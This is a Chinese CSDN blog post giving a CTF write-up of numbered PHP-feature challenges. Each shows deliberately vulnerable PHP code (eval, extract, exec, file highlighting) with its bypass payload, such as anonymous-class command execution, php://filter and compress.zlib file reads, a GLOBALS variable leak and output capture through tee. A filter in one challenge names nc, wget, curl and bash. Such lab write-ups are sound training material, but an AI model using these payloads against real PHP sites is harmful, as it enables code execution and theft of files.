CTF php特性(中)

最新推荐文章于 2024-08-09 17:50:34 发布
最新推荐文章于 2024-08-09 17:50:34 发布
阅读量860 收藏 7
点赞数 22
分类专栏: 网络安全 CTF 文章标签: php 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81556781/article/details/140724961
版权

17.

highlight_file(__FILE__); 
error_reporting(0); 
if(isset($_GET['v1']) && isset($_GET['v2'])){   
    $v1 = $_GET['v1'];   
    $v2 = $_GET['v2'];   
    if(preg_match('/[a-zA-Z]+/', $v1) && preg_match('/[a-zA-Z]+/', $v2)){       
        eval("echo new $v1($v2());");
    }
}

因为它是 v1(v2())的这种嵌套手法

所以用匿名类绕过 ?v1=class{ public function __construct(){ system('ls'); } };&v2=a 或者是 ?v1=ReflectionClass&v2=system('ls)

其中ReflectionClass 与 class{public function __construct()}类似

18.

highlight_file(__FILE__); 
error_reporting(0); 
if(isset($_GET['v1']) && isset($_GET['v2'])){   
    $v1 = $_GET['v1'];   
    $v2 = $_GET['v2'];   if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v1)){       die("error v1"); 
}  
    if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v2)){       
        die("error v2");   
    }  
    eval("echo new $v1($v2());"); 
}

增加了对v1 v2的过滤手段,因此无法使用内置类的手法

?v1=FilesystemIterator&v2=getcwd

FilesystemIterator可以用来遍历目录,需要一个路径参数

函数getcwd可以返回当前工作路径且不需要参数,由此可以构造payload

19.

highlight_file(__FILE__); 
error_reporting(0); 
include("flag.php"); 
function getFlag(&$v1,&$v2){   
    eval("$$v1 = &$$v2;");   
    var_dump($$v1);
}  
if(isset($_GET['v1']) && isset($_GET['v2'])){   
    $v1 = $_GET['v1'];   
    $v2 = $_GET['v2'];   
    if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $v1)){       
        die("error v1");
    }  
    if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $v2)){  
        die("error v2"); 
    }     
    if(preg_match('/ctfshow/', $v1)){
        getFlag($v1,$v2);
    }   
}

PHP 的函数具有词法作用域

在函数内部无法调用外部的变量,除非进行传参

我们最终要得到 $flag 的值,就需要 var_dump($$v1) 中的 $v1 为 flag,即 $v2 要为 flag,这样 $$v2 就为 $flag,&$$v2 就为 $flag 对应的值

URL 传参时 $v2 不能直接传为 flag,否则 $flag 会因“函数内部无法调用外部变量”的限制而导致其返回 null

要想跨过词法作用域的限制,可以用 GLOBALS 常量数组,其中包含了 $flag 键值对,就可以将 $flag 的值赋给 $$v1

?v1=ctfshow&v2=GLOBALS

20.

highlight_file(__FILE__); 
error_reporting(0); 
function filter($file){   if(preg_match('/\.\.\/|http|https|data|input|rot13|base64|string/i',$file)){    
    die("hacker!"); 
}else{   
    return $file;   
} 
} 
$file=$_GET['file']; if(! is_file($file)){   highlight_file(filter($file)); 
                                         }else{  
    echo "hacker!";
}

题中过滤了 data、input 等伪协议,又过滤了 string、data、rot13 相关的过滤器,但我们依然可以用 php://filter 伪协议搭载其他过滤器 或者不搭过滤器

?file=php://filter/resource=flag.php

21.

highlight_file(__FILE__); 
error_reporting(0); 
function filter($file){  
    if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){ 
        die('hacker!');   
    }else{   
        return $file;  
    }
} 
$file=$_GET['file']; 
if(! is_file($file)){ 
    highlight_file(filter($file)); 
}else{  
    echo "hacker!"; 
}

利用php中zip伪协议 用法[源于php官方提供的一些例子]: compress.zlib://file.gz compress.zlib://file.bz2

?file=compress.zlib://flag.php

22.

error_reporting(0);
highlight_file(__FILE__); 
function filter($file){   
 if(preg_match('/compress|root|zip|convert|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){    
     die('hacker!');  
 }else{   
     return $file;  
 } 
} 
$file=$_GET['file'];
echo "师傅们居然tql都是非预期 哼!"; 
if(! is_file($file)){  
    highlight_file(filter($file)); 
}else{
    echo "hacker!"; 
}

?file=php://filter/resource=flag.php

23.

include('flag.php');
highlight_file(__FILE__); 
error_reporting(0);
function filter($num){ 
    $num=str_replace("0x","1",$num);  
    $num=str_replace("0","1",$num);   
    $num=str_replace(".","1",$num);  
    $num=str_replace("e","1",$num); 
    $num=str_replace("+","1",$num);   
    return $num; 
} 
$num=$_GET['num']; 
if(is_numeric($num) and $num!=='36' and trim($num)!=='36' and filter($num)=='36'){  
    if($num=='36'){    
        echo $flag;  
    }else{   
        echo "hacker!!"; 
    } 
}else{ 
    echo "hacker!!!"; 
}

在php中"36"是等于"\x0c36"的,同时trim也不会过滤掉\x0c也就是%0c

?num=%0c36 此时$num不等于36,且为数字,trim以后也不等于36,且'\x0c36'=='36'

24.

error_reporting(0); 
highlight_file(__FILE__); 
include("flag.php"); 
$a=$_SERVER['argv']; 
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){   
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?/", $c)&&$c<=18){   
        eval("$c".";");      
        if($fl0g==="flag_give_me"){  
            echo $flag;   
        } 
    } 
}

这道题目中,对c进行限制,但是没有限制字母和空格,c=echo $flag 就可以运行

但是要必须保证CTF_SHOW存在 和 CTF_SHOW.COM存在 而 fl0g 不存在

由于在php中变量名只有数字字母下划线,被get或者post传入的变量名,如果含有空格、+、[则会被转化为,所以按理来说我们构造不出CTF_SHOW.COM这个变量(因为含有.),但php中有个特性就是如果传入[,它被转化为之后,后面的字符就会被保留下来不会被替换

POST请求: CTF_SHOW=&CTF[SHOW.COM=1&fun= echo $flag

25.

error_reporting(0); 
highlight_file(__FILE__); 
include("flag.php"); 
$a=$_SERVER['argv']; 
$c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){  
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print/i", $c)&&$c<=16){     
        eval("$c".";");     
        if($fl0g==="flag_give_me"){       
            echo $flag;    
        }
    }
}

多过滤了flag|GLOBALS|echo|var_dump|print,但是我们还要include可以使用

GET请求: ?1=php://filter/convert.base64-encode/resource=flag.php

post请求: CTF_SHOW=1&CTF[SHOW.COM=1&fun=include$_GET[1]

26.

error_reporting(0); 
include("flag.php"); 
highlight_file(__FILE__); 
$ctf_show = md5($flag);
$url = $_SERVER['QUERY_STRING']; 
//特殊字符检测 
function waf($url){  
    if(preg_match('/\`|\~|\!|\@|\#|\^|\*|\(|\)|\\$|\_|\-|\+|\{|\;|\:|\[|\]|\}|\'|\"|\<|\,|\>|\.|\\\|\//', $url)){   
        return true; 
    }else{   
        return false;
    }
}
if(waf($url)){  
    die("嗯哼?"); 
}else{
    extract($_GET);
} 
if($ctf_show==='ilove36d'){  
    echo $flag;
}

'+' '['被过滤了,用%20替代

?ctf%20show=ilove36d

27.

error_reporting(0); 
include("flag.php"); 
highlight_file(__FILE__); 
$f1 = $_GET['f1']; 
$f2 = $_GET['f2']; 
if(check($f1)){  
    var_dump(call_user_func(call_user_func($f1,$f2))); 
}else{   
    echo "嗯哼?"; 
}
function check($str){ 
    return !preg_match('/[0-9]|[a-z]/i', $str);
}

_() 函数即 gettext() 函数,可以将参数翻译成指定语言,一般就是原封不动的输出参数

get_defined_vars 函数可以输出所有变量的信息,两者结合拿到 flag

?f1=_&f2=get_defined_vars

28.

highlight_file(__FILE__); 
$key1 = 0; 
$key2 = 0; 
if(isset($_GET['key1']) || isset($_GET['key2']) || isset($_POST['key1']) || isset($_POST['key2'])) {
    die("nonononono");
} 
@parse_str($_SERVER['QUERY_STRING']); 
extract($_POST); 
if($key1 == '36d' && $key2 == '36d') {
    die(file_get_contents('flag.php'));
}

$_SERVER[‘QUERY_STRING’]解释

PHP extract() 函数

extract() 函数从数组中将变量导入到当前的符号表

?POST[key1]=36d&POST[key2]=36d

29.

error_reporting(0); 
function check($x){  
    if(preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $x)){     
        die('too young too simple sometimes naive!');
    }
} 
if(isset($_GET['c'])){   
    $c=$_GET['c'];   
    check($c); 
    exec($c); 
}else{ 
    highlight_file(__FILE__);
}

Linux tee命令

常规方式命令可执行,但是回显一直为1 因为>过滤,使用tee命令,可以变为另一个文件,类似>

?c=ls /|tee 2 访问2下载查看文件

?c=cat /f149_15_h3r3|tee 3 访问下载查看文件

2301_81556781
关注
  • 22
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF Web学习笔记
01-11
CTF竞赛,经常出现的情况是将flag隐藏在图像、音频文件甚至压缩包。为了提取这些隐藏的信息,选手们需要掌握多种文件格式的特性和处理方法,比如了解JPEG、PNG等图像格式如何存储额外的数据;或者掌握如何利用...
BrixelCTF2020:brixel CTF 2020 的源文件和文章
05-31
CTF比赛PHP挑战通常涉及到代码审计、漏洞挖掘、逻辑错误识别等环节,这些都是实际安全防护至关重要的环节。 首先,了解PHP的基础语法是解决PHP挑战的关键。这包括变量、数据类型、函数、控制结构等。例如,...
[0xGameCTF 2023] web题解
rev1ve的博客
10-14 1940
分析一下,过滤了分号,空格,斜杠,flag。参数c不为数字,不等于1024,且转换为整数时等于1024;简单分析一下,首先会检测MIME类型是否正确,然后经过二次渲染上传到指定路径。查看页面源码,发现存在前端检测(所以命令执行要bp抓包)和告诉我们hint。(这里我最初上传的gif带一句话木马刚好没被改,就不用再添加一句话木马了)然后在posts文件夹找到,得到flag。我们这里用的是gif,我们先上传一下。bp抓包,添加命令得到flag。访问,命令执行得到flag。按照要求来,得到flag。
PHP代码审计入门1
lwwzyy
09-03 342
CTFPHP代码审计
文件包含漏洞&伪协议
qq_62078839的博客
04-16 2309
文件包含 文件包含漏洞原理 PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入 include:包含并运行指定的文件,包含文件发生错误时,程序警告,但会继续执行。 include_once:检查这个文件是否已经被导入,如果已导入,便不会再导入。 require:包含并运行指定的文件,包含文件发生错误时,程序直接终止执行。 require_once:和 require 类似,不同处在于
靶场训练笔记-ctf训练营WEB方向第一章新手村1第6题:ezinclude
ddingddding的博客
08-21 569
对网址为ctf.hetianlab.com的ctf训练营WEB方向第一章新手村1第6题:ezinclude的做题全过程
ctfshow】文件包含练习2
qq_61109509的博客
02-11 2125
目录 web78 解法一 解法二 web79 解法一 解法二 web80 web81 web88 web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 解法一 用include包含 /?file=php://filter/read=convert.base64-enc...
ctf常见php特性
2301_79863884的博客
01-10 1111
本地文件包含: 本地文件包含漏洞是指攻击者通过应用程序的,成功包含本地系统文件,并在其执行恶意代码。攻击者可以利用该漏洞读取敏感文件、执行系统命令或将Web服务器配置文件修改为恶意内容。以下是一个示例上述示例,应用程序从URL参数获取文件名并将其包含到代码。攻击者可以通过在URL添加恶意文件路径来访问未经授权的文件。远程文件包含: 远程文件包含漏洞是指攻击者通过应用程序的输入点,成功包含远程服务器上的文件,并在其执行恶意代码。
CTFPHP特性
qq_45086218的博客
02-26 4195
文章目录正则表达式元字符模式修正符preg_match()数组绕过换行绕过intval()字符绕过科学计数法进制转换小数点绕过strpos()md5强类型比较弱类型比较md5碰撞file_put_contents()in_array()优先级 本文以ctf.show网站题目为例,总结ctfphp特性 正则表达式 元字符 模式修正符 preg_match() 数组绕过 preg_match()只能处理字符串,当传入的subject是数组时会返回false if(preg_match("/[0-9]/
2024年网络安全最新ctf常见php特性_php特性 ctf
m0_54903333的博客
05-03 852
在这个例子,如果攻击者将恶意的PHP代码作为评论提交,如,它会被存储到数据库,并在评论显示时执行。这种远程代码执行漏洞可能导致攻击者获得应用程序的控制权,执行任意的系统命令,访问敏感数据等。24. ## 六、PHP类型强制转换:通过利用PHP的弱类型特性,攻击者可以绕过输入验证,执行非预期的操作。25. PHP类型强制转换是指通过利用PHP的弱类型特性,攻击者可以绕过输入验证,执行非预期的操作。
青少年CTF——PHP特性01
2301_78684637的博客
10-10 144
青少年CTF——PHP特性01
PICO CTF2013 PHP3.rar
09-30
不过,根据标题的"PHP3",我们可以推测这可能涉及到使用PHP 3版本的代码,这是一个较旧的PHP版本,可能存在特定的已知安全漏洞或行为,对于参赛者来说,可能需要对这个版本的特性有深入理解。 【压缩包子文件的...
【技术分享】ctfphp的一些trick .pdf
09-05
PHP是一种广泛用于Web开发的服务器端脚本语言,因此在CTF,了解其特性和潜在的安全漏洞至关重要。 在PHP,有多个超全局变量用于获取HTTP请求的数据。例如,`$_GET`、`$_POST`、`$_COOKIE`分别用于存储GET、POST...
AWD攻防比赛 PHP WAF
10-16
在AWD比赛,为了实现"完美防住"的目标,PHP WAF需要具备以下特性: - **全面的规则覆盖**:WAF的规则库需要涵盖各种已知的攻击手法,同时也要能应对新的攻击手段。 - **高效性能**:在高并发环境下,WAF应保持...
LNMP环境搭建论坛
qq_63652578的博客
08-07 980
root@Rocky8-node1 ~]# mv upload/* /usr/share/nginx/html/ #把upload下的所有内容移动到/usr/share/nginx/html/[root@Rocky8-node1 ~]# sed -i '/^group =/ c \group = nginx' /etc/php-fpm.d/www.conf #将组改为nginx。
[FSCTF 2023]细狗2.0
最新发布
2301_81462177的博客
08-09 268
cmd=ls${lFS}-1剁FSS9-后面加个$与{类似,起截断作用,$9是当前系统shel进程第九个参数持有者始终为空字符串。cmd=lsSlFS-l单纯$IFS2,IFS2被bash解释器当做变量名,输不出来结果,加一个{}就固定了变量名。ca\t/*123*/f* 发现不可以,看题解后发现使用${IFS}绕过。cmd=ls$lFs$9-1 (这里1到9应该都可以)ca\t$IFS/f* 可得flag。尝试输入cat /f*
ctfhub文件包含
a666666688的博客
08-07 490
文件的内容,通常这个文件包含一些敏感信息,比如CTF比赛的flag。这样就可以通过浏览器或其他HTTP客户端看到。,直接访问这个URL将导致服务器读取并返回。
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1375
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
2019 ISCC CTF挑战:代码审计解密PHP脚本
在2019年信息安全挑战大会(ISCC)的CTF安全比赛,有一道相对简单的题目,题目名为"2019ISCC writeup"。这道题目属于代码审计类别,主要考察参赛者对PHP函数的理解和利用,特别是涉及到的缺陷或特性分析。挑战者需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值